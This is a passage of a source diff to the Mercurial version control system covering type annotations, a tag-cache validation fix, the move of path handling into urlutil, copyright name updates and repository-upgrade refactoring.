@@ -285,6 +313,7 @@ def precommit(ui, wctx, status, match, force=False): + # type: (uimod.ui, context.workingcommitctx, scmutil.status, matchmod.basematcher, bool) -> Tuple[List[bytes], Set[bytes], Substate] """Calculate .hgsubstate changes that should be applied before committing Returns (subs, commitsubs, newstate) where @@ -354,7 +383,26 @@ return subs, commitsubs, newstate +def repo_rel_or_abs_source(repo): + """return the source of this repo + + Either absolute or relative the outermost repo""" + parent = repo + chunks = [] + while util.safehasattr(parent, b'_subparent'): + source = urlutil.url(parent._subsource) + chunks.append(bytes(source)) + if source.isabs(): + break + parent = parent._subparent + + chunks.reverse() + path = posixpath.join(*chunks) + return posixpath.normpath(path) + + def reporelpath(repo): + # type: (localrepo.localrepository) -> bytes """return path to this (sub)repo as seen from outermost repo""" parent = repo while util.safehasattr(parent, b'_subparent'): @@ -363,21 +411,23 @@ def subrelpath(sub): + # type: (subrepo.abstractsubrepo) -> bytes """return path to this subrepo as seen from outermost repo""" return sub._relpath def _abssource(repo, push=False, abort=True): + # type: (localrepo.localrepository, bool, bool) -> Optional[bytes] """return pull/push path of repo - either based on parent repo .hgsub info or on the top repo config. 
Abort or return None if no source found.""" if util.safehasattr(repo, b'_subparent'): - source = util.url(repo._subsource) + source = urlutil.url(repo._subsource) if source.isabs(): return bytes(source) source.path = posixpath.normpath(source.path) parent = _abssource(repo._subparent, push, abort=False) if parent: - parent = util.url(util.pconvert(parent)) + parent = urlutil.url(util.pconvert(parent)) parent.path = posixpath.join(parent.path or b'', source.path) parent.path = posixpath.normpath(parent.path) return bytes(parent) @@ -406,7 +456,7 @@ # # D:\>python -c "import os; print os.path.abspath('C:relative')" # C:\some\path\relative - if util.hasdriveletter(path): + if urlutil.hasdriveletter(path): if len(path) == 2 or path[2:3] not in br'\/': path = os.path.abspath(path) return path @@ -416,6 +466,7 @@ def newcommitphase(ui, ctx): + # type: (uimod.ui, context.changectx) -> int commitphase = phases.newcommitphase(ui) substate = getattr(ctx, "substate", None) if not substate: diff --git a/mercurial/tags.py b/mercurial/tags.py --- a/mercurial/tags.py +++ b/mercurial/tags.py @@ -1,6 +1,6 @@ # tags.py - read tag info from local repository # -# Copyright 2009 Matt Mackall <mpm@selenic.com> +# Copyright 2009 Olivia Mackall <olivia@selenic.com> # Copyright 2009 Greg Ward <greg@gerg.ca> # # This software may be used and distributed according to the terms of the @@ -494,11 +494,25 @@ starttime = util.timer() fnodescache = hgtagsfnodescache(repo.unfiltered()) cachefnode = {} + validated_fnodes = set() + unknown_entries = set() for node in nodes: fnode = fnodescache.getfnode(node) + flog = repo.file(b'.hgtags') if fnode != nullid: + if fnode not in validated_fnodes: + if flog.hasnode(fnode): + validated_fnodes.add(fnode) + else: + unknown_entries.add(node) cachefnode[node] = fnode + if unknown_entries: + fixed_nodemap = fnodescache.refresh_invalid_nodes(unknown_entries) + for node, fnode in pycompat.iteritems(fixed_nodemap): + if fnode != nullid: + cachefnode[node] = 
fnode + fnodescache.write() duration = util.timer() - starttime @@ -733,6 +747,7 @@ if rawlen < wantedlen: if self._dirtyoffset is None: self._dirtyoffset = rawlen + # TODO: zero fill entire record, because it's invalid not missing? self._raw.extend(b'\xff' * (wantedlen - rawlen)) def getfnode(self, node, computemissing=True): @@ -740,7 +755,8 @@ If the value is in the cache, the entry will be validated and returned. Otherwise, the filenode will be computed and returned unless - "computemissing" is False, in which case None will be returned without + "computemissing" is False. In that case, None will be returned if + the entry is missing or False if the entry is invalid without any potentially expensive computation being performed. If an .hgtags does not exist at the specified revision, nullid is @@ -771,8 +787,19 @@ # If we get here, the entry is either missing or invalid. if not computemissing: + if record != _fnodesmissingrec: + return False return None + fnode = self._computefnode(node) + self._writeentry(offset, properprefix, fnode) + return fnode + + def _computefnode(self, node): + """Finds the tag filenode for a node which is missing or invalid + in cache""" + ctx = self._repo[node] + rev = ctx.rev() fnode = None cl = self._repo.changelog p1rev, p2rev = cl._uncheckedparentrevs(rev) @@ -788,7 +815,7 @@ # we cannot rely on readfast because we don't know against what # parent the readfast delta is computed p1fnode = None - if p1fnode is not None: + if p1fnode: mctx = ctx.manifestctx() fnode = mctx.readfast().get(b'.hgtags') if fnode is None: @@ -800,8 +827,6 @@ except error.LookupError: # No .hgtags file on this revision. 
fnode = nullid - - self._writeentry(offset, properprefix, fnode) return fnode def setfnode(self, node, fnode): @@ -815,6 +840,21 @@ self._writeentry(ctx.rev() * _fnodesrecsize, node[0:4], fnode) + def refresh_invalid_nodes(self, nodes): + """recomputes file nodes for a given set of nodes which has unknown + filenodes for them in the cache + Also updates the in-memory cache with the correct filenode. + Caller needs to take care about calling `.write()` so that updates are + persisted. + Returns a map {node: recomputed fnode} + """ + fixed_nodemap = {} + for node in nodes: + fnode = self._computefnode(node) + fixed_nodemap[node] = fnode + self.setfnode(node, fnode) + return fixed_nodemap + def _writeentry(self, offset, prefix, fnode): # Slices on array instances only accept other array. entry = bytearray(prefix + fnode) diff --git a/mercurial/templatefilters.py b/mercurial/templatefilters.py --- a/mercurial/templatefilters.py +++ b/mercurial/templatefilters.py @@ -1,6 +1,6 @@ # templatefilters.py - common template expansion filters # -# Copyright 2005-2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/templatefuncs.py b/mercurial/templatefuncs.py --- a/mercurial/templatefuncs.py +++ b/mercurial/templatefuncs.py @@ -1,6 +1,6 @@ # templatefuncs.py - common template functions # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/templatekw.py b/mercurial/templatekw.py --- a/mercurial/templatekw.py +++ b/mercurial/templatekw.py @@ -1,6 +1,6 @@ # templatekw.py - common changeset template keywords # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/templater.py b/mercurial/templater.py --- a/mercurial/templater.py +++ b/mercurial/templater.py @@ -1,6 +1,6 @@ # templater.py - template expansion for output # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -891,7 +891,7 @@ fp = _open_mapfile(path) cache, tmap, aliases = _readmapfile(fp, path) - for key, val in conf[b'templates'].items(): + for key, val in conf.items(b'templates'): if not val: raise error.ParseError( _(b'missing value'), conf.source(b'templates', key) @@ -904,7 +904,7 @@ cache[key] = unquotestring(val) elif key != b'__base__': tmap[key] = os.path.join(base, val) - aliases.extend(conf[b'templatealias'].items()) + aliases.extend(conf.items(b'templatealias')) return cache, tmap, aliases diff --git a/mercurial/templateutil.py b/mercurial/templateutil.py --- a/mercurial/templateutil.py +++ b/mercurial/templateutil.py @@ -1,6 +1,6 @@ # templateutil.py - utility for template evaluation # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/testing/__init__.py b/mercurial/testing/__init__.py --- a/mercurial/testing/__init__.py +++ b/mercurial/testing/__init__.py @@ -0,0 +1,35 @@ +from __future__ import ( + absolute_import, + division, +) + +import os +import time + + +# work around check-code complains +# +# This is a simple log level module doing simple test related work, we can't +# import more things, and we do not need it. +environ = getattr(os, 'environ') + + +def _timeout_factor(): + """return the current modification to timeout""" + default = int(environ.get('HGTEST_TIMEOUT_DEFAULT', 1)) + current = int(environ.get('HGTEST_TIMEOUT', default)) + return current / float(default) + + +def wait_file(path, timeout=10): + timeout *= _timeout_factor() + start = time.time() + while not os.path.exists(path): + if time.time() - start > timeout: + raise RuntimeError(b"timed out waiting for file: %s" % path) + time.sleep(0.01) + + +def write_file(path, content=b''): + with open(path, 'wb') as f: + f.write(content) diff --git a/mercurial/testing/storage.py b/mercurial/testing/storage.py --- a/mercurial/testing/storage.py +++ b/mercurial/testing/storage.py @@ -1129,12 +1129,13 @@ with self._maketransactionfn() as tr: nodes = [] - def onchangeset(cl, node): + def onchangeset(cl, rev): + node = cl.node(rev) nodes.append(node) cb(cl, node) - def ondupchangeset(cl, node): - nodes.append(node) + def ondupchangeset(cl, rev): + nodes.append(cl.node(rev)) f.addgroup( [], @@ -1157,18 +1158,19 @@ f = self._makefilefn() deltas = [ - (node0, nullid, nullid, nullid, nullid, delta0, 0), + (node0, nullid, nullid, nullid, nullid, delta0, 0, {}), ] with self._maketransactionfn() as tr: nodes = [] - def onchangeset(cl, node): + def onchangeset(cl, rev): + node = cl.node(rev) nodes.append(node) cb(cl, node) - def ondupchangeset(cl, node): - nodes.append(node) + def ondupchangeset(cl, rev): + nodes.append(cl.node(rev)) f.addgroup( deltas, @@ -1212,13 +1214,15 @@ for i, fulltext in enumerate(fulltexts): 
delta = mdiff.trivialdiffheader(len(fulltext)) + fulltext - deltas.append((nodes[i], nullid, nullid, nullid, nullid, delta, 0)) + deltas.append( + (nodes[i], nullid, nullid, nullid, nullid, delta, 0, {}) + ) with self._maketransactionfn() as tr: newnodes = [] - def onchangeset(cl, node): - newnodes.append(node) + def onchangeset(cl, rev): + newnodes.append(cl.node(rev)) f.addgroup( deltas, @@ -1260,7 +1264,9 @@ ) delta = mdiff.textdiff(b'bar\n' * 30, (b'bar\n' * 30) + b'baz\n') - deltas = [(b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0)] + deltas = [ + (b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0, {}) + ] with self._maketransactionfn() as tr: with self.assertRaises(error.CensoredBaseError): diff --git a/mercurial/transaction.py b/mercurial/transaction.py --- a/mercurial/transaction.py +++ b/mercurial/transaction.py @@ -6,7 +6,7 @@ # effectively log-structured, this should amount to simply truncating # anything that isn't referenced in the changelog. # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/treediscovery.py b/mercurial/treediscovery.py --- a/mercurial/treediscovery.py +++ b/mercurial/treediscovery.py @@ -1,6 +1,6 @@ # discovery.py - protocol changeset discovery functions # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -1,6 +1,6 @@ # ui.py - user interface bits for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -26,7 +26,6 @@ from .pycompat import ( getattr, open, - setattr, ) from . import ( @@ -48,6 +47,7 @@ procutil, resourceutil, stringutil, + urlutil, ) urlreq = util.urlreq @@ -302,6 +302,11 @@ if k in self.environ: self._exportableenviron[k] = self.environ[k] + def _new_source(self): + self._ocfg.new_source() + self._tcfg.new_source() + self._ucfg.new_source() + @classmethod def load(cls): """Create a ui and load global and user configs""" @@ -313,6 +318,7 @@ elif t == b'resource': u.read_resource_config(f, trust=True) elif t == b'items': + u._new_source() sections = set() for section, name, value, source in f: # do not set u._ocfg @@ -325,6 +331,7 @@ else: raise error.ProgrammingError(b'unknown rctype: %s' % t) u._maybetweakdefaults() + u._new_source() # anything after that is a different level return u def _maybetweakdefaults(self): @@ -552,9 +559,9 @@ ) p = p.replace(b'%%', b'%') p = util.expandpath(p) - if not util.hasscheme(p) and not os.path.isabs(p): + if not urlutil.hasscheme(p) and not os.path.isabs(p): p = os.path.normpath(os.path.join(root, p)) - c.set(b"paths", n, p) + c.alter(b"paths", n, p) if section in (None, b'ui'): # update ui options @@ -655,11 +662,18 @@ msg %= (section, name, pycompat.bytestr(default)) self.develwarn(msg, 2, b'warn-config-default') + candidates = [] + config = self._data(untrusted) for s, n in alternates: - candidate = self._data(untrusted).get(s, n, None) + candidate = config.get(s, n, None) if candidate is not None: - value = candidate - break + candidates.append((s, n, candidate)) + if candidates: + + def level(x): + return 
config.level(x[0], x[1]) + + value = max(candidates, key=level)[2] if self.debugflag and not untrusted and self._reportuntrusted: for s, n in alternates: @@ -1016,8 +1030,10 @@ def expandpath(self, loc, default=None): """Return repository location relative to cwd or from [paths]""" + msg = b'ui.expandpath is deprecated, use `get_*` functions from urlutil' + self.deprecwarn(msg, b'6.0') try: - p = self.paths.getpath(loc) + p = self.getpath(loc) if p: return p.rawloc except error.RepoError: @@ -1025,7 +1041,7 @@ if default: try: - p = self.paths.getpath(default) + p = self.getpath(default) if p: return p.rawloc except error.RepoError: @@ -1035,7 +1051,14 @@ @util.propertycache def paths(self): - return paths(self) + return urlutil.paths(self) + + def getpath(self, *args, **kwargs): + """see paths.getpath for details + + This method exist as `getpath` need a ui for potential warning message. + """ + return self.paths.getpath(self, *args, **kwargs) @property def fout(self): @@ -2159,192 +2182,6 @@ return util._estimatememory() -class paths(dict): - """Represents a collection of paths and their configs. - - Data is initially derived from ui instances and the config files they have - loaded. - """ - - def __init__(self, ui): - dict.__init__(self) - - for name, loc in ui.configitems(b'paths', ignoresub=True): - # No location is the same as not existing. - if not loc: - continue - loc, sub = ui.configsuboptions(b'paths', name) - self[name] = path(ui, name, rawloc=loc, suboptions=sub) - - def getpath(self, name, default=None): - """Return a ``path`` from a string, falling back to default. - - ``name`` can be a named path or locations. Locations are filesystem - paths or URIs. - - Returns None if ``name`` is not a registered path, a URI, or a local - path to a repo. - """ - # Only fall back to default if no path was requested. 
- if name is None: - if not default: - default = () - elif not isinstance(default, (tuple, list)): - default = (default,) - for k in default: - try: - return self[k] - except KeyError: - continue - return None - - # Most likely empty string. - # This may need to raise in the future. - if not name: - return None - - try: - return self[name] - except KeyError: - # Try to resolve as a local path or URI. - try: - # We don't pass sub-options in, so no need to pass ui instance. - return path(None, None, rawloc=name) - except ValueError: - raise error.RepoError(_(b'repository %s does not exist') % name) - - -_pathsuboptions = {} - - -def pathsuboption(option, attr): - """Decorator used to declare a path sub-option. - - Arguments are the sub-option name and the attribute it should set on - ``path`` instances. - - The decorated function will receive as arguments a ``ui`` instance, - ``path`` instance, and the string value of this option from the config. - The function should return the value that will be set on the ``path`` - instance. - - This decorator can be used to perform additional verification of - sub-options and to change the type of sub-options. - """ - - def register(func): - _pathsuboptions[option] = (attr, func) - return func - - return register - - -@pathsuboption(b'pushurl', b'pushloc') -def pushurlpathoption(ui, path, value): - u = util.url(value) - # Actually require a URL. - if not u.scheme: - ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) - return None - - # Don't support the #foo syntax in the push URL to declare branch to - # push. 
- if u.fragment: - ui.warn( - _( - b'("#fragment" in paths.%s:pushurl not supported; ' - b'ignoring)\n' - ) - % path.name - ) - u.fragment = None - - return bytes(u) - - -@pathsuboption(b'pushrev', b'pushrev') -def pushrevpathoption(ui, path, value): - return value - - -class path(object): - """Represents an individual path and its configuration.""" - - def __init__(self, ui, name, rawloc=None, suboptions=None): - """Construct a path from its config options. - - ``ui`` is the ``ui`` instance the path is coming from. - ``name`` is the symbolic name of the path. - ``rawloc`` is the raw location, as defined in the config. - ``pushloc`` is the raw locations pushes should be made to. - - If ``name`` is not defined, we require that the location be a) a local - filesystem path with a .hg directory or b) a URL. If not, - ``ValueError`` is raised. - """ - if not rawloc: - raise ValueError(b'rawloc must be defined') - - # Locations may define branches via syntax <base>#<branch>. - u = util.url(rawloc) - branch = None - if u.fragment: - branch = u.fragment - u.fragment = None - - self.url = u - self.branch = branch - - self.name = name - self.rawloc = rawloc - self.loc = b'%s' % u - - # When given a raw location but not a symbolic name, validate the - # location is valid. - if not name and not u.scheme and not self._isvalidlocalpath(self.loc): - raise ValueError( - b'location is not a URL or path to a local ' - b'repo: %s' % rawloc - ) - - suboptions = suboptions or {} - - # Now process the sub-options. If a sub-option is registered, its - # attribute will always be present. The value will be None if there - # was no valid sub-option. - for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): - if suboption not in suboptions: - setattr(self, attr, None) - continue - - value = func(ui, self, suboptions[suboption]) - setattr(self, attr, value) - - def _isvalidlocalpath(self, path): - """Returns True if the given path is a potentially valid repository. 
- This is its own function so that extensions can change the definition of - 'valid' in this case (like when pulling from a git repo into a hg - one).""" - try: - return os.path.isdir(os.path.join(path, b'.hg')) - # Python 2 may return TypeError. Python 3, ValueError. - except (TypeError, ValueError): - return False - - @property - def suboptions(self): - """Return sub-options and their values for this path. - - This is intended to be used for presentation purposes. - """ - d = {} - for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions): - value = getattr(self, attr) - if value is not None: - d[subopt] = value - return d - - # we instantiate one globally shared progress bar to avoid # competing progress bars when multiple UI objects get created _progresssingleton = None diff --git a/mercurial/unionrepo.py b/mercurial/unionrepo.py --- a/mercurial/unionrepo.py +++ b/mercurial/unionrepo.py @@ -128,6 +128,7 @@ deltas, linkmapper, transaction, + alwayscache=False, addrevisioncb=None, duplicaterevisioncb=None, maybemissingparents=False, @@ -152,9 +153,9 @@ class unionmanifest(unionrevlog, manifest.manifestrevlog): - def __init__(self, opener, opener2, linkmapper): - manifest.manifestrevlog.__init__(self, opener) - manifest2 = manifest.manifestrevlog(opener2) + def __init__(self, nodeconstants, opener, opener2, linkmapper): + manifest.manifestrevlog.__init__(self, nodeconstants, opener) + manifest2 = manifest.manifestrevlog(nodeconstants, opener2) unionrevlog.__init__( self, opener, self.indexfile, manifest2, linkmapper ) @@ -204,7 +205,10 @@ @localrepo.unfilteredpropertycache def manifestlog(self): rootstore = unionmanifest( - self.svfs, self.repo2.svfs, self.unfiltered()._clrev + self.nodeconstants, + self.svfs, + self.repo2.svfs, + self.unfiltered()._clrev, ) return manifest.manifestlog( self.svfs, self, rootstore, self.narrowmatch() diff --git a/mercurial/upgrade.py b/mercurial/upgrade.py --- a/mercurial/upgrade.py +++ b/mercurial/upgrade.py @@ -118,6 +118,7 
@@ up_actions, removed_actions, revlogs, + backup, ) if not run: @@ -215,12 +216,6 @@ backuppath = upgrade_engine.upgrade( ui, repo, dstrepo, upgrade_op ) - if not backup: - ui.status( - _(b'removing old repository content %s\n') % backuppath - ) - repo.vfs.rmtree(backuppath, forcibly=True) - backuppath = None finally: ui.status(_(b'removing temporary repository %s\n') % tmppath) diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -23,7 +23,7 @@ # list of requirements that request a clone of all revlog if added/removed RECLONES_REQUIREMENTS = { - b'generaldelta', + requirements.GENERALDELTA_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, } @@ -69,6 +69,18 @@ postdowngrademessage Message intended for humans which will be shown post an upgrade operation in which this improvement was removed + + touches_filelogs (bool) + Whether this improvement touches filelogs + + touches_manifests (bool) + Whether this improvement touches manifests + + touches_changelog (bool) + Whether this improvement touches changelog + + touches_requirements (bool) + Whether this improvement changes repository requirements """ def __init__(self, name, type, description, upgrademessage): @@ -78,6 +90,12 @@ self.upgrademessage = upgrademessage self.postupgrademessage = None self.postdowngrademessage = None + # By default for now, we assume every improvement touches + # all the things + self.touches_filelogs = True + self.touches_manifests = True + self.touches_changelog = True + self.touches_requirements = True def __eq__(self, other): if not isinstance(other, improvement): @@ -131,6 +149,12 @@ # operation in which this improvement was removed postdowngrademessage = None + # By default for now, we assume every improvement touches all the things + touches_filelogs = True + touches_manifests = True + touches_changelog = True + touches_requirements = True + def __init__(self): 
raise NotImplementedError() @@ -176,7 +200,7 @@ class fncache(requirementformatvariant): name = b'fncache' - _requirement = b'fncache' + _requirement = requirements.FNCACHE_REQUIREMENT default = True @@ -196,7 +220,7 @@ class dotencode(requirementformatvariant): name = b'dotencode' - _requirement = b'dotencode' + _requirement = requirements.DOTENCODE_REQUIREMENT default = True @@ -215,7 +239,7 @@ class generaldelta(requirementformatvariant): name = b'generaldelta' - _requirement = b'generaldelta' + _requirement = requirements.GENERALDELTA_REQUIREMENT default = True @@ -270,6 +294,12 @@ b' New shares will be created in safe mode.' ) + # upgrade only needs to change the requirements + touches_filelogs = False + touches_manifests = False + touches_changelog = False + touches_requirements = True + @registerformatvariant class sparserevlog(requirementformatvariant): @@ -298,22 +328,6 @@ @registerformatvariant -class sidedata(requirementformatvariant): - name = b'sidedata' - - _requirement = requirements.SIDEDATA_REQUIREMENT - - default = False - - description = _( - b'Allows storage of extra data alongside a revision, ' - b'unlocking various caching options.' 
- ) - - upgrademessage = _(b'Allows storage of extra data alongside a revision.') - - -@registerformatvariant class persistentnodemap(requirementformatvariant): name = b'persistent-nodemap' @@ -344,6 +358,15 @@ @registerformatvariant +class revlogv2(requirementformatvariant): + name = b'revlog-v2' + _requirement = requirements.REVLOGV2_REQUIREMENT + default = False + description = _(b'Version 2 of the revlog.') + upgrademessage = _(b'very experimental') + + +@registerformatvariant class removecldeltachain(formatvariant): name = b'plain-cl-delta' @@ -375,10 +398,21 @@ return True +_has_zstd = ( + b'zstd' in util.compengines + and util.compengines[b'zstd'].available() + and util.compengines[b'zstd'].revlogheader() +) + + @registerformatvariant class compressionengine(formatvariant): name = b'compression' - default = b'zlib' + + if _has_zstd: + default = b'zstd' + else: + default = b'zlib' description = _( b'Compresion algorithm used to compress data. ' @@ -408,7 +442,9 @@ # return the first valid value as the selection code would do for comp in compengines: if comp in util.compengines: - return comp + e = util.compengines[comp] + if e.available() and e.revlogheader(): + return comp # no valide compression found lets display it all for clarity return b','.join(compengines) @@ -629,6 +665,7 @@ upgrade_actions, removed_actions, revlogs_to_process, + backup_store, ): self.ui = ui self.new_requirements = new_requirements @@ -673,6 +710,75 @@ b're-delta-multibase' in self._upgrade_actions_names ) + # should this operation create a backup of the store + self.backup_store = backup_store + + # whether the operation touches different revlogs at all or not + self.touches_filelogs = self._touches_filelogs() + self.touches_manifests = self._touches_manifests() + self.touches_changelog = self._touches_changelog() + # whether the operation touches requirements file or not + self.touches_requirements = self._touches_requirements() + self.touches_store = ( + self.touches_filelogs + 
or self.touches_manifests + or self.touches_changelog + ) + # does the operation only touches repository requirement + self.requirements_only = ( + self.touches_requirements and not self.touches_store + ) + + def _touches_filelogs(self): + for a in self.upgrade_actions: + # in optimisations, we re-process the revlogs again + if a.type == OPTIMISATION: + return True + elif a.touches_filelogs: + return True + for a in self.removed_actions: + if a.touches_filelogs: + return True + return False + + def _touches_manifests(self): + for a in self.upgrade_actions: + # in optimisations, we re-process the revlogs again + if a.type == OPTIMISATION: + return True + elif a.touches_manifests: + return True + for a in self.removed_actions: + if a.touches_manifests: + return True + return False + + def _touches_changelog(self): + for a in self.upgrade_actions: + # in optimisations, we re-process the revlogs again + if a.type == OPTIMISATION: + return True + elif a.touches_changelog: + return True + for a in self.removed_actions: + if a.touches_changelog: + return True + return False + + def _touches_requirements(self): + for a in self.upgrade_actions: + # optimisations are used to re-process revlogs and does not result + # in a requirement being added or removed + if a.type == OPTIMISATION: + pass + elif a.touches_requirements: + return True + for a in self.removed_actions: + if a.touches_requirements: + return True + + return False + def _write_labeled(self, l, label): """ Utility function to aid writing of a list under one label @@ -760,9 +866,7 @@ """ return { # Introduced in Mercurial 0.9.2. - b'revlogv1', - # Introduced in Mercurial 0.9.2. 
- b'store', + requirements.STORE_REQUIREMENT, } @@ -784,9 +888,21 @@ } +def check_revlog_version(reqs): + """Check that the requirements contain at least one Revlog version""" + all_revlogs = { + requirements.REVLOGV1_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, + } + if not all_revlogs.intersection(reqs): + msg = _(b'cannot upgrade repository; missing a revlog version') + raise error.Abort(msg) + + def check_source_requirements(repo): """Ensure that no existing requirements prevent the repository upgrade""" + check_revlog_version(repo.requirements) required = requiredsourcerequirements(repo) missingreqs = required - repo.requirements if missingreqs: @@ -818,6 +934,8 @@ requirements.COPIESSDC_REQUIREMENT, requirements.NODEMAP_REQUIREMENT, requirements.SHARESAFE_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, + requirements.REVLOGV1_REQUIREMENT, } for name in compression.compengines: engine = compression.compengines[name] @@ -837,16 +955,17 @@ Extensions should monkeypatch this to add their custom requirements. """ supported = { - b'dotencode', - b'fncache', - b'generaldelta', - b'revlogv1', - b'store', + requirements.DOTENCODE_REQUIREMENT, + requirements.FNCACHE_REQUIREMENT, + requirements.GENERALDELTA_REQUIREMENT, + requirements.REVLOGV1_REQUIREMENT, # allowed in case of downgrade + requirements.STORE_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, requirements.COPIESSDC_REQUIREMENT, requirements.NODEMAP_REQUIREMENT, requirements.SHARESAFE_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, } for name in compression.compengines: engine = compression.compengines[name] @@ -868,14 +987,16 @@ future, unknown requirements from accidentally being added. 
""" supported = { - b'dotencode', - b'fncache', - b'generaldelta', + requirements.DOTENCODE_REQUIREMENT, + requirements.FNCACHE_REQUIREMENT, + requirements.GENERALDELTA_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, requirements.COPIESSDC_REQUIREMENT, requirements.NODEMAP_REQUIREMENT, requirements.SHARESAFE_REQUIREMENT, + requirements.REVLOGV1_REQUIREMENT, + requirements.REVLOGV2_REQUIREMENT, } for name in compression.compengines: engine = compression.compengines[name] @@ -888,7 +1009,7 @@ def check_requirements_changes(repo, new_reqs): old_reqs = repo.requirements - + check_revlog_version(repo.requirements) support_removal = supportremovedrequirements(repo) no_remove_reqs = old_reqs - new_reqs - support_removal if no_remove_reqs: diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -21,27 +21,34 @@ requirements, revlog, scmutil, + store, util, vfs as vfsmod, ) +from ..revlogutils import nodemap -def _revlogfrompath(repo, path): +def _revlogfrompath(repo, rl_type, path): """Obtain a revlog from a repo path. An instance of the appropriate class is returned. 
""" - if path == b'00changelog.i': + if rl_type & store.FILEFLAGS_CHANGELOG: return changelog.changelog(repo.svfs) - elif path.endswith(b'00manifest.i'): - mandir = path[: -len(b'00manifest.i')] - return manifest.manifestrevlog(repo.svfs, tree=mandir) + elif rl_type & store.FILEFLAGS_MANIFESTLOG: + mandir = b'' + if b'/' in path: + mandir = path.rsplit(b'/', 1)[0] + return manifest.manifestrevlog( + repo.nodeconstants, repo.svfs, tree=mandir + ) else: - # reverse of "/".join(("data", path + ".i")) - return filelog.filelog(repo.svfs, path[5:-2]) + # drop the extension and the `data/` prefix + path = path.rsplit(b'.', 1)[0].split(b'/', 1)[1] + return filelog.filelog(repo.svfs, path) -def _copyrevlog(tr, destrepo, oldrl, unencodedname): +def _copyrevlog(tr, destrepo, oldrl, rl_type, unencodedname): """copy all relevant files for `oldrl` into `destrepo` store Files are copied "as is" without any transformation. The copy is performed @@ -49,7 +56,7 @@ content is compatible with format of the destination repository. """ oldrl = getattr(oldrl, '_revlog', oldrl) - newrl = _revlogfrompath(destrepo, unencodedname) + newrl = _revlogfrompath(destrepo, rl_type, unencodedname) newrl = getattr(newrl, '_revlog', newrl) oldvfs = oldrl.opener @@ -67,10 +74,7 @@ if copydata: util.copyfile(olddata, newdata) - if not ( - unencodedname.endswith(b'00changelog.i') - or unencodedname.endswith(b'00manifest.i') - ): + if rl_type & store.FILEFLAGS_FILELOG: destrepo.svfs.fncache.add(unencodedname) if copydata: destrepo.svfs.fncache.add(unencodedname[:-2] + b'.d') @@ -104,17 +108,18 @@ return sidedatacompanion -def matchrevlog(revlogfilter, entry): +def matchrevlog(revlogfilter, rl_type): """check if a revlog is selected for cloning. In other words, are there any updates which need to be done on revlog or it can be blindly copied. 
The store entry is checked against the passed filter""" - if entry.endswith(b'00changelog.i'): + if rl_type & store.FILEFLAGS_CHANGELOG: return UPGRADE_CHANGELOG in revlogfilter - elif entry.endswith(b'00manifest.i'): + elif rl_type & store.FILEFLAGS_MANIFESTLOG: return UPGRADE_MANIFEST in revlogfilter + assert rl_type & store.FILEFLAGS_FILELOG return UPGRADE_FILELOGS in revlogfilter @@ -123,6 +128,7 @@ dstrepo, tr, old_revlog, + rl_type, unencoded, upgrade_op, sidedatacompanion, @@ -130,11 +136,11 @@ ): """ returns the new revlog object created""" newrl = None - if matchrevlog(upgrade_op.revlogs_to_process, unencoded): + if matchrevlog(upgrade_op.revlogs_to_process, rl_type): ui.note( _(b'cloning %d revisions from %s\n') % (len(old_revlog), unencoded) ) - newrl = _revlogfrompath(dstrepo, unencoded) + newrl = _revlogfrompath(dstrepo, rl_type, unencoded) old_revlog.clone( tr, newrl, @@ -146,9 +152,9 @@ else: msg = _(b'blindly copying %s containing %i revisions\n') ui.note(msg % (unencoded, len(old_revlog))) - _copyrevlog(tr, dstrepo, old_revlog, unencoded) + _copyrevlog(tr, dstrepo, old_revlog, rl_type, unencoded) - newrl = _revlogfrompath(dstrepo, unencoded) + newrl = _revlogfrompath(dstrepo, rl_type, unencoded) return newrl @@ -189,11 +195,11 @@ # Perform a pass to collect metadata. This validates we can open all # source files and allows a unified progress bar to be displayed. - for unencoded, encoded, size in alldatafiles: - if not unencoded.endswith(b'.i'): + for rl_type, unencoded, encoded, size in alldatafiles: 